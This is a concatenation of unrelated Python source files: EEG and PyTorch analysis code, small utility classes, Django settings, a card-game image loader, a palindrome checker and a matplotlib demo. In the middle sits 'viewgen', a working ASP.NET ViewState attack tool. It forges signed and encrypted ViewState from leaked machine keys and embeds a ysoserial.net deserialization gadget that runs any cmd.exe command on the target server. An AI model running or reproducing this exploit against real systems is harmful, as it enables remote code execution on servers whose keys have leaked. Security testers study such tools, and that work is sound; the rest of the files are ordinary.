        right = tfr_data.loc[rh_idx, :].groupby(
            ['freq', 'trial']).mean()
        if hemi == 'Pair':
            # Keep both hemispheres as separate '_LH'/'_RH' clusters.
            left.loc[:, 'cluster'] = cluster + '_LH'
            left.loc[:, 'hemi'] = 'Pair'
            right.loc[:, 'cluster'] = cluster + '_RH'
            right.loc[:, 'hemi'] = 'Pair'
            clusters.append(left)
            clusters.append(right)
        else:
            # NOTE(review): any hemi value other than 'Pair', 'Lateralized'
            # or 'Averaged' leaves `tfrs` undefined (NameError) — confirm
            # callers only pass these three strategies.
            if hemi == 'Lateralized':
                tfrs = left - right
            elif hemi == 'Averaged':
                tfrs = (right + left) / 2
            tfrs.loc[:, 'cluster'] = cluster
            tfrs.loc[:, 'hemi'] = hemi
            clusters.append(tfrs)
    df = pd.concat(clusters)
    df.set_index(['cluster', 'hemi'], append=True, inplace=True)
    return df.reorder_levels(
        ['hemi', 'cluster', 'trial', 'freq'])
def ensure_iter(input):
    """Yield the items of *input*, treating strings and scalars as one item.

    A string is iterable but callers want it whole, not char-by-char;
    a non-iterable value is wrapped and yielded as-is.
    """
    if isinstance(input, str):
        yield input
        return
    try:
        yield from input
    except TypeError:
        # Not iterable at all — yield the bare value.
        yield input
|
import torch
from torch.autograd import Variable
import torch.nn as nn
from torch.nn.functional import cross_entropy
from Dictionary.utils import word_vector_from_seq
from metrics.feature_extraction.definition_classifier \
import DefinitionClassifier
def evaluate_representations(model, corpus, batch_size, bptt_limit, cuda):
    """
    Measure the richness of the hidden states by using them as features
    for a multi-class classification model.

    Assumes that each section is a passage with an omitted-term and a
    'target' to predict.

    We first train a two-layer neural network to serve as the classifier
    before evaluation begins.
    """
    classifier_data = []
    feature_size = None
    target_set = set()

    # Collect the data for the classifier (harvest hidden states and pair
    # with targets).
    model.eval()
    print("Evaluation in progress: Representations")
    for i, document in enumerate(corpus.test):
        for j, section in enumerate(document["sections"]):
            hidden = model.init_hidden()
            # Training at the word level allows flexibility in inference.
            for k in range(section.size(0) - 1):
                current_word = word_vector_from_seq(section, k)
                if cuda:
                    current_word = current_word.cuda()
                output, hidden = model(Variable(current_word), hidden)
            # Flatten the model's final hidden states to be used as features.
            # NOTE(review): assumes `hidden` is a single tensor (RNN/GRU);
            # an LSTM returns a (h, c) tuple — confirm against the model.
            features = hidden.view(-1, 1)
            if feature_size is None:
                feature_size = features.size()[0]
            # Each section has a corresponding target.
            target = document["targets"][j]
            target_set.add(target)
            classifier_data.append({
                "features": features.data,
                "target": target
            })

    # See how well the hidden states represent semantics:
    target_size = len(target_set)
    definition_classifier = DefinitionClassifier(feature_size, 128, target_size)
    optimizer = torch.optim.Adam(definition_classifier.parameters(), lr=0.005)
    epochs = 2
    classifier_accuracy = train_classifier(definition_classifier, classifier_data,
                                           epochs, target_set, optimizer, cuda)
    # Bug fix: "{.5f}" is an invalid format spec and raised ValueError;
    # the correct spec is "{:.5f}".
    print("Classification accuracy from hidden state features: {:.5f}"
          .format(classifier_accuracy))
def train_classifier(model, data, epochs, target_set, optimizer, cuda):
    """
    Train a definition classifier for `epochs` passes and report accuracy.

    Args:
        model: classifier module mapping a feature tensor to class scores.
        data: list of {"features": Tensor, "target": hashable} examples.
        epochs: number of passes over `data`.
        target_set: set of all distinct targets; defines the label space.
        optimizer: torch optimizer over `model`'s parameters.
        cuda: move tensors to the GPU when True.

    Returns:
        float: fraction of examples classified correctly after training.
    """
    total_loss = 0
    # Establish integer labels for each target:
    target_mappings = {}
    target_list = list(target_set)
    for i, target in enumerate(target_list):
        target_mappings[target] = i

    # Helper function for conversion to Variable for learning.
    def target_to_variable(target):
        target_variable = torch.LongTensor(1)
        target_variable[0] = target_mappings[target]
        target_variable = Variable(target_variable)
        return target_variable

    # Set model to training mode (activates dropout and other things).
    model.train()
    print("Classifier Training in progress:")
    for _ in range(epochs):
        for i, example in enumerate(data):
            features = example["features"]
            target = target_to_variable(example["target"])
            if cuda:
                features = features.cuda()
                target = target.cuda()
            output = model(Variable(features))
            # Loss between predicted class scores and the true label.
            loss = cross_entropy(output.view(1, -1), target)
            # Bug fix: `loss.data[0]` fails on 0-dim tensors; `.item()` is
            # the supported accessor and keeps total_loss a plain float.
            total_loss += loss.item()
            # Backpropagation.
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
    # Bug fixes: total_loss is a float (not subscriptable), and "{.5f}"
    # is an invalid format spec — must be "{:.5f}".
    print("Total loss from training: {:.5f}".format(total_loss))

    # Calculate final accuracy.
    model.eval()
    correct = 0
    for i, example in enumerate(data):
        features = example["features"]
        # `target` here is a plain int label, so (bug fix) it must NOT be
        # moved with .cuda(); only the feature tensor is device-dependent.
        target = target_mappings[example["target"]]
        if cuda:
            features = features.cuda()
        output = model(Variable(features))
        _, prediction = torch.max(output, 0)
        if prediction == target:
            correct += 1
    return correct / len(data)
|
class FundamentalType(object):
    """A primitive (non-composite) type identified only by its name."""

    def __init__(self, name):
        # Kept private; exposed read-only through the `typename` property.
        self._typename = name

    @property
    def typename(self):
        """str: the name of this fundamental type."""
        return self._typename
class StructureType(object):
    """A named composite type built from an ordered list of field types."""

    def __init__(self, name, fields):
        self._name = name
        self._fields = fields

    @property
    def typename(self):
        """str: the structure's name."""
        return self._name

    @property
    def fields(self):
        """Yield (field_type, generated_name) pairs, named f0, f1, ..."""
        for position, field_type in enumerate(self._fields):
            yield field_type, 'f%d' % position
class ArrayType(object):
    """A fixed-size array of some base type."""

    def __init__(self, basetype, size):
        self.basetype = basetype
        self.size = size

    @property
    def typename(self):
        """str: C-style spelling, e.g. ``int[4]``."""
        base_name = self.basetype.typename
        return '%s[%d]' % (base_name, self.size)
|
#!/usr/bin/env python3
from pprint import pprint
from Crypto.Cipher import AES
from Crypto.Cipher import DES
from Crypto.Cipher import DES3
from viewstate import ViewState
from xml.dom import minidom
from colored import fg, attr
import argparse
import hashlib
import hmac
import base64
import os
import binascii
import struct
def pad(s, bs):
    """PKCS#7-pad byte string *s* up to a multiple of block size *bs*."""
    fill = bs - len(s) % bs
    return s + chr(fill).encode("ascii") * fill


def unpad(s):
    """Strip PKCS#7 padding from byte string *s*."""
    last_byte = s[len(s) - 1:]
    return s[:-ord(last_byte)]
def success(s):
    """Print *s* as a bold success message with a green '+' marker."""
    marker = "[%s+%s] " % (fg("light_green"), attr(0))
    print("%s%s%s%s%s" % (marker, attr(1), s, attr(21), attr(0)))
def warning(s):
    """Print *s* as a bold warning message with a yellow '!' marker."""
    marker = "[%s!%s] " % (fg("yellow"), attr(0))
    print("%s%s%s%s%s" % (marker, attr(1), s, attr(21), attr(0)))
class ViewGen:
    """Generate, sign, encrypt, decrypt and verify ASP.NET ViewState blobs.

    Mirrors the .NET ViewState MAC/encryption pipeline; algorithm names
    map onto hashlib / PyCryptodome primitives through the two lookup
    tables below.
    """
    # Fixed 4-byte modifier used by the legacy MD5 validation mode.
    MD5_MODIFIER = b"\x00"*4
    # Byte width of the packed VIEWSTATEGENERATOR modifier.
    MODIFIER_SIZE = 4
    # "AES"/"3DES" validation modes still MAC with SHA1 under the hood.
    hash_algs = {"SHA1": hashlib.sha1, "MD5": hashlib.md5, "SHA256": hashlib.sha256, "SHA384": hashlib.sha384, "SHA512": hashlib.sha512, "AES": hashlib.sha1, "3DES": hashlib.sha1}
    hash_sizes = {"SHA1": 20, "MD5": 16, "SHA256": 32, "SHA384": 48, "SHA512": 64, "AES": 20, "3DES": 20}
    def __init__(self, validation_key=None, validation_alg=None, dec_key=None, dec_alg=None, modifier=None, encrypted=False):
        """Store key material, normalise algorithm names and reset IV state.

        `modifier` is the hex VIEWSTATEGENERATOR value; it is packed
        little-endian into 4 bytes.
        """
        self.validation_key = validation_key
        self.dec_key = dec_key
        self._init_validation_alg(validation_alg)
        self._init_dec_alg(dec_alg)
        self.encrypted = encrypted
        if modifier is None:
            self.modifier = ViewGen.MD5_MODIFIER
        else:
            self.modifier = struct.pack("<I", int(modifier, 16))
        self._reuse_iv = False
        self._iv = None
        self._random_bytes = None
    def encode(self, payload, reuse_iv=False):
        """Sign (and, if configured, encrypt) a base64 ViewState payload.

        With reuse_iv=True the IV/random bytes captured by a previous
        decrypt() are reused, enabling round-trip signature checks.
        """
        self._reuse_iv = reuse_iv
        if self.encrypted:
            return self.encrypt_and_sign(payload)
        return self.sign(payload)
    def decode(self, payload, parse=False):
        """Decode a ViewState payload; returns (payload_or_tree, signature).

        Returns (None, None) when the payload cannot be parsed.
        """
        if self.encrypted:
            payload, signature = self.decrypt(payload)
            try:
                vs = ViewState(payload)
            except:
                print(f"[!] Invalid formatting. Decrypted ViewState printed below in Base64:\n{payload}")
                return None, None
        else:
            vs = ViewState(payload)
            try:
                vs.decode()
                signature = vs.signature
                # NOTE(review): adopts the MAC algorithm detected by the
                # viewstate library when none was configured.
                if self.validation_alg is None:
                    self.validation_alg = vs.mac
                # Strip the trailing MAC so only the raw payload remains.
                payload = base64.b64encode(base64.b64decode(payload)[:-self._get_hash_size()])
            except:
                return None, None
        if parse:
            return vs.decode(), signature
        return payload, signature
    def encrypt(self, data):
        """Encrypt raw bytes with the configured cipher.

        Returns (ciphertext, iv), or None for an unknown algorithm.
        AES mode prepends one block of random bytes, matching .NET.
        """
        iv = self._iv
        random_bytes = self._random_bytes
        if self.dec_alg == "AES":
            if not self._reuse_iv:
                iv = self._gen_random_bytes(AES.block_size)
                random_bytes = self._gen_random_bytes(AES.block_size)
            cipher = AES.new(self.dec_key, AES.MODE_CBC, iv)
            payload = pad(random_bytes + data + self.modifier, AES.block_size)
        elif self.dec_alg == "DES":
            if not self._reuse_iv:
                iv = self._gen_random_bytes(DES.block_size)
            cipher = DES.new(self.dec_key[:8], DES.MODE_CBC, iv)
            payload = pad(data + self.modifier, DES.block_size)
        elif self.dec_alg == "3DES":
            if not self._reuse_iv:
                iv = self._gen_random_bytes(DES3.block_size)
            cipher = DES3.new(self.dec_key[:24], DES3.MODE_CBC, iv)
            payload = pad(data + self.modifier, DES3.block_size)
        else:
            return None
        return cipher.encrypt(payload), iv
    def decrypt(self, payload):
        """Decrypt a base64 payload laid out as iv || ciphertext || mac.

        Returns (base64 plaintext, signature); also caches the IV and AES
        random prefix so encode(reuse_iv=True) can reproduce the blob.
        """
        data = base64.b64decode(payload)
        hash_size = self._get_hash_size()
        if self.dec_alg == "AES":
            iv = data[0:AES.block_size]
            enc = data[AES.block_size:-hash_size]
            cipher = AES.new(self.dec_key, AES.MODE_CBC, iv)
            block_size = AES.block_size
            random_bytes_size = block_size
        elif self.dec_alg == "DES":
            iv = data[0:DES.block_size]
            enc = data[DES.block_size:-hash_size]
            cipher = DES.new(self.dec_key[:8], DES.MODE_CBC, iv)
            random_bytes_size = 0
        elif self.dec_alg == "3DES":
            iv = data[0:DES3.block_size]
            enc = data[DES3.block_size:-hash_size]
            cipher = DES3.new(self.dec_key[:24], DES3.MODE_CBC, iv)
            random_bytes_size = 0
        else:
            return None
        dec = cipher.decrypt(enc)
        signature = data[-hash_size:]
        unpad_dec = unpad(dec)
        self._random_bytes = unpad_dec[:random_bytes_size]
        self._iv = iv
        # NOTE(review): `modifier` is extracted but never used below.
        modifier = unpad_dec[-ViewGen.MODIFIER_SIZE:]
        idx = ViewGen.MODIFIER_SIZE
        # AES/3DES validation modes embed an extra 20-byte SHA1 signature.
        if self._double_signature:
            idx += 20
        return base64.b64encode(unpad_dec[random_bytes_size:-idx]), signature
    def encrypt_and_sign(self, payload):
        """Encrypt the payload, then MAC iv||ciphertext; returns base64."""
        if self._double_signature:
            payload = self.sign(payload)
        data = base64.b64decode(payload)
        enc, iv = self.encrypt(data)
        if "MD5" in self.validation_alg:
            # Legacy MD5 mode: plain hash with the key appended.
            h = hashlib.md5(iv + enc + self.validation_key)
        else:
            hash_alg = self._get_hash_alg()
            if hash_alg:
                h = hmac.new(self.validation_key, iv + enc, hash_alg)
            else:
                return None
        return base64.b64encode(iv + enc + h.digest())
    def sign(self, payload):
        """Append a MAC over payload (+ modifier) and return it base64'd."""
        data = base64.b64decode(payload)
        if "MD5" in self.validation_alg:
            h = hashlib.md5(data + self.validation_key + ViewGen.MD5_MODIFIER)
        else:
            hash_alg = self._get_hash_alg()
            if hash_alg:
                h = hmac.new(self.validation_key, data + self.modifier, hash_alg)
            else:
                # Unknown algorithm: return the payload unsigned.
                return base64.b64encode(data)
        return base64.b64encode(data + h.digest())
    @staticmethod
    def guess_algorithms(payload):
        """Return (cipher, hash) pairs whose sizes fit the payload length."""
        payload_size = len(base64.b64decode(payload))
        candidates = []
        for hash_alg in ViewGen.hash_sizes.keys():
            hash_size = ViewGen.hash_sizes[hash_alg]
            # Ciphertext minus the MAC must align to the cipher block size.
            if (payload_size - hash_size) % AES.block_size == 0:
                candidates.append(("AES", hash_alg))
            if (payload_size - hash_size) % DES.block_size == 0:
                candidates.append(("DES/3DES", hash_alg))
        return candidates
    @staticmethod
    def _gen_random_bytes(n):
        # Cryptographically secure random bytes for IVs/prefixes.
        return os.urandom(n)
    def _init_dec_alg(self, dec_alg):
        """Normalise the decryption algorithm, inferring from key length."""
        self.dec_alg = dec_alg.upper()
        if "AUTO" in self.dec_alg:
            # 8-byte keys can only be single DES; otherwise assume AES.
            if len(self.dec_key) == 8:
                self.dec_alg = "DES"
            else:
                self.dec_alg = "AES"
        if self.dec_alg == "3DES":
            if len(self.dec_key) == 8:
                self.dec_alg = "DES"
    def _init_validation_alg(self, validation_alg):
        """Normalise the validation algorithm and flag double signing."""
        self.validation_alg = validation_alg.upper()
        self._double_signature = False
        # AES/3DES validation wraps an inner SHA1 signature before encrypting.
        if "AES" in self.validation_alg or "3DES" in self.validation_alg:
            self._double_signature = True
    def _get_hash_size(self):
        """Digest size in bytes for the configured validation algorithm."""
        return self._search_dict(ViewGen.hash_sizes, self.validation_alg)
    def _get_hash_alg(self):
        """hashlib constructor for the configured validation algorithm."""
        return self._search_dict(ViewGen.hash_algs, self.validation_alg)
    @staticmethod
    def _search_dict(d, query):
        # Substring match so e.g. "HMACSHA256" still resolves to SHA256.
        items = [value for key, value in d.items() if query in key.upper()]
        if not items:
            return None
        return items[0]
def generate_shell_payload(command):
    """Build a .NET deserialization gadget that runs *command* via cmd.exe.

    The template is a ysoserial.net-generated BinaryFormatter payload whose
    baked-in command is "/c ping 8.8.8.8"; the command substring is spliced
    in below with a recomputed .NET string length-prefix byte.
    """
    # Generated with: https://github.com/pwntester/ysoserial.net
    ysoserial_net_shell_payload = "/wEy7REAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAADy9jIHBpbmcgOC44LjguOAYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMDAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAABVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBCgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5JbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL"
    # chr(len(command)+3) rewrites the length prefix ("/c " adds 3 bytes).
    return base64.b64encode(base64.b64decode(ysoserial_net_shell_payload).replace(b"\x0f/c ping 8.8.8.8", bytes("%s%s%s" % (chr(len(command)+3), "/c ", command), "utf-8")))
def read_webconfig(webconfig_path):
    """Extract machine-key material and encryption mode from a web.config.

    Returns (validation_key, validation_alg, decryption_key,
    decryption_alg, encrypted).
    """
    doc = minidom.parse(webconfig_path)
    machine_key = doc.getElementsByTagName("machineKey")[0]
    validation_key = machine_key.getAttribute("validationKey")
    validation_alg = machine_key.getAttribute("validation").upper()
    decryption_key = machine_key.getAttribute("decryptionKey")
    decryption_alg = machine_key.getAttribute("decryption").upper()
    # AES/3DES validation implies an encrypted ViewState, as does an
    # explicit viewStateEncryptionMode="Always" on any <pages> element.
    encrypted = validation_alg in ("AES", "3DES")
    for pages in doc.getElementsByTagName("pages"):
        if pages.getAttribute("viewStateEncryptionMode") == "Always":
            encrypted = True
    return (validation_key, validation_alg,
            decryption_key, decryption_alg, encrypted)
def parse_args():
    """Build the CLI, parse sys.argv, and overlay web.config values if given."""
    cli = argparse.ArgumentParser(description="viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys or web.config files")
    cli.add_argument("--webconfig", help="automatically load keys and algorithms from a web.config file", required=False)
    cli.add_argument("-m", "--modifier", help="VIEWSTATEGENERATOR value", required=False, default="00000000")
    cli.add_argument("-c", "--command", help="command to execute", required=False)
    cli.add_argument("--decode", help="decode a ViewState payload", required=False, default=False, action="store_true")
    cli.add_argument("--decrypt", help="print decrypted ViewState payload (don't try to decode)", required=False, default=False, action="store_true")
    cli.add_argument("--guess", help="guess signature and encryption mode for a given payload", required=False, default=False, action="store_true")
    cli.add_argument("--check", help="check if modifier and keys are correct for a given payload", required=False, default=False, action="store_true")
    cli.add_argument("--vkey", help="validation key", required=False, default="")
    cli.add_argument("--valg", help="validation algorithm", required=False, default="")
    cli.add_argument("--dkey", help="decryption key", required=False, default="")
    cli.add_argument("--dalg", help="decryption algorithm", required=False, default="")
    cli.add_argument("-e", "--encrypted", help="ViewState is encrypted", required=False, default=False, action="store_true")
    cli.add_argument("payload", help="ViewState payload (base 64 encoded)", nargs="?")
    parsed = cli.parse_args()
    # A web.config, when supplied, overrides any individually-passed keys.
    if parsed.webconfig:
        (parsed.vkey, parsed.valg, parsed.dkey,
         parsed.dalg, parsed.encrypted) = read_webconfig(parsed.webconfig)
    return parsed
def run_viewgen(args):
    """Dispatch the CLI actions: decrypt, decode, check, guess or generate."""
    if args.payload is None and args.command is None:
        warning("The following arguments are required: payload")
        exit(1)
    # "generate" is the default action when no other mode flag is set.
    generate = not args.decode and not args.check and not args.guess
    if generate or args.check:
        # Generating or round-trip checking requires full key material.
        if not args.vkey or not args.valg or not args.dkey or not args.dalg:
            warning("Please provide validation/decryption keys and algorithms or a valid web.config")
            exit(1)
    viewgen = ViewGen(binascii.unhexlify(args.vkey), args.valg, binascii.unhexlify(args.dkey), args.dalg, args.modifier, args.encrypted)
    # New option from @ramen0x3f
    if args.decrypt:
        # NOTE(review): ViewGen.decrypt returns None for an unknown cipher,
        # which would make this subscript raise before the None check below.
        viewstate = viewgen.decrypt(args.payload)[0].decode('ascii')
        if viewstate is not None:
            print(f"Decrypted ViewState (decode with Base64): {viewstate}")
    if args.decode:
        viewstate, signature = viewgen.decode(args.payload, parse=True)
        success("ViewState")
        pprint(viewstate)
        if signature is not None:
            success("Signature: %s" % str(binascii.hexlify(signature), "utf-8"))
    if args.check:
        # Round-trip: decode, re-encode with the same IV, and compare MACs.
        viewstate, sa = viewgen.decode(args.payload)
        encoded = viewgen.encode(viewstate, reuse_iv=True)
        viewstate, sb = viewgen.decode(encoded)
        if sa == sb:
            success("Signature match")
        else:
            warning("Signature fail")
    if args.guess:
        viewstate, signature = viewgen.decode(args.payload)
        if viewstate is None:
            # Could not parse: assume encryption and guess by blob sizes.
            warning("ViewState is encrypted")
            candidates = viewgen.guess_algorithms(args.payload)
            success("Algorithm candidates:")
            for candidate in candidates:
                print("%s %s" % (candidate[0], candidate[1].upper()))
        else:
            if viewgen.encrypted:
                success("ViewState has been decrypted")
            else:
                success("ViewState is not encrypted")
            if signature is None:
                success("ViewState is not signed")
            else:
                # Reverse-lookup the hash algorithm from the MAC length.
                hash_alg = list(viewgen.hash_sizes.keys())[list(viewgen.hash_sizes.values()).index(len(signature))]
                success("Signature algorithm: %s" % hash_alg.upper())
    if generate:
        if args.command is None:
            result = viewgen.encode(args.payload)
        else:
            result = viewgen.encode(generate_shell_payload(args.command))
        print(str(result, "utf-8"))
# CLI entry point: parse arguments (optionally from web.config) and dispatch.
if __name__ == "__main__":
    args = parse_args()
    run_viewgen(args)
|
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
from .data import langs
class Language(object):
    """A language identified by its ISO code, resolved against `langs`.

    Raises:
        KeyError: when the iso code is not present in the `langs` table.
    """

    def __init__(self, iso):
        self.iso = iso
        try:
            self.name = langs[iso]
        except KeyError:
            raise KeyError("Language with iso code '%s' unknown" % iso)

    def __repr__(self):
        return u"Language(iso={})".format(self.iso)

    def __str__(self):
        return self.name

    def __eq__(self, other):
        # Bug fix: comparing against a non-Language object used to raise
        # AttributeError; returning NotImplemented lets Python fall back
        # to its default comparison (== evaluates to False).
        if not isinstance(other, Language):
            return NotImplemented
        return self.iso == other.iso and self.name == other.name

    def __hash__(self):
        # Defining __eq__ alone made instances unhashable in Python 3;
        # hash on the same fields used for equality.
        return hash((self.iso, self.name))
|
from django.conf import settings
import humanfriendly
# humanfriendly value
# see: https://humanfriendly.readthedocs.io/en/latest/readme.html#a-note-about-size-units # noqa
MINIO_STORAGE_MAX_FILE_SIZE = getattr(
    settings, 'MINIO_STORAGE_MAX_FILE_SIZE', "100M")
MAX_FILE_SIZE = humanfriendly.parse_size(MINIO_STORAGE_MAX_FILE_SIZE)
assert MAX_FILE_SIZE > 0, "File size is small"
# The database must be re-migrated whenever this value changes.
MINIO_STORAGE_MAX_FILE_NAME_LEN = getattr(
    settings, 'MINIO_STORAGE_MAX_FILE_NAME_LEN', 100)
assert MINIO_STORAGE_MAX_FILE_NAME_LEN > 0, "File name is small"
# Maximum number of files in a single object,
# e.g. 5 attachments in one ticket.
# None - unlimited.
MINIO_STORAGE_MAX_FILES_COUNT = getattr(
    settings, 'MINIO_STORAGE_MAX_FILES_COUNT', None)
MINIO_STORAGE_USE_HTTPS = getattr(
    settings, 'MINIO_STORAGE_USE_HTTPS', False)
# Verify the user has provided all required settings
# (attribute access raises when one is missing).
MINIO_STORAGE_ENDPOINT = settings.MINIO_STORAGE_ENDPOINT
MINIO_STORAGE_ACCESS_KEY = settings.MINIO_STORAGE_ACCESS_KEY
MINIO_STORAGE_SECRET_KEY = settings.MINIO_STORAGE_SECRET_KEY
MINIO_STORAGE_BUCKET_NAME = settings.MINIO_STORAGE_BUCKET_NAME
MINIO_STORAGE_CLEAN_PERIOD = getattr(
    settings, 'MINIO_STORAGE_CLEAN_PERIOD', 30)
TAGS_COUNT_MAX = 10
TAGS_CHARACTER_LIMIT = 100
|
from tkinter import PhotoImage
import random
from ImageDeck import ImageDeck
class TestingGroundsImages(object):
    """Image resources for the testing grounds: card backs and card decks."""

    def __init__(self):
        # Placeholder image sized like a card, plus the menu background.
        self.Blank = PhotoImage(width=70,height=100)
        self.MainMenu = PhotoImage(file='Images\\main menu_testing grounds.gif')
        self.backs = [PhotoImage(file='Images\\back_adorably hideous.gif')]
        self.decks = []
        # Standard oxygen deck.
        oxygen_deck = ImageDeck('Images\\oxygen\\')
        self.oxygen = oxygen_deck
        self.decks.append(oxygen_deck)
        self.backs.append(oxygen_deck.Back)
        # White oxygen variant, which also carries a joker card.
        white_deck = ImageDeck('Images\\oxygen white\\')
        white_deck.Joker = PhotoImage(file='Images\\oxygen white\\joker.gif')
        self.oxygenWhite = white_deck
        self.decks.append(white_deck)
        self.backs.append(white_deck.Back)

    def GetRandomBack(self) -> PhotoImage:
        """Pick one card-back image at random."""
        return random.choice(self.backs)

    def GetRandomDeck(self) -> ImageDeck:
        """Pick one deck at random."""
        return random.choice(self.decks)
# Simple interactive palindrome checker.
print('I will check if a string is a palindrome.')
text = input('Enter some text: ').strip().lower()


def reverseText(string):
    """Return *string* reversed."""
    return ''.join(reversed(string))


message = ('It is a palindrome.'
           if text == reverseText(text)
           else 'It is not a palindrome.')
print(message)
|
from django.apps import AppConfig
class PhotoBlogConfig(AppConfig):
    """Django application configuration for the photo_blog app."""
    name = 'photo_blog'
    def ready(self):
        # Imported for its side effects: registers the app's signal handlers
        # once the app registry is fully populated.
        import photo_blog.signals
"""
============
axhspan Demo
============
Create lines or rectangles that span the axes in either the horizontal or
vertical direction.
"""
import numpy as np
import matplotlib.pyplot as plt
t = np.arange(-1, 2, .01)
s = np.sin(2 * np.pi * t)
plt.plot(t, s)
# Draw a thick red hline at y=0 that spans the xrange
plt.axhline(linewidth=8, color='#d62728')
# Draw a default hline at y=1 that spans the xrange
plt.axhline(y=1)
# Draw a default vline at x=1 that spans the yrange
plt.axvline(x=1)
# Draw a thick blue vline at x=0 that spans the upper quadrant of the yrange
plt.axvline(x=0, ymin=0.75, linewidth=8, color='#1f77b4')
# Draw a default hline at y=.5 that spans the middle half of the axes
plt.axhline(y=.5, xmin=0.25, xmax=0.75)
plt.axhspan(0.25, 0.75, facecolor='0.5', alpha=0.5)
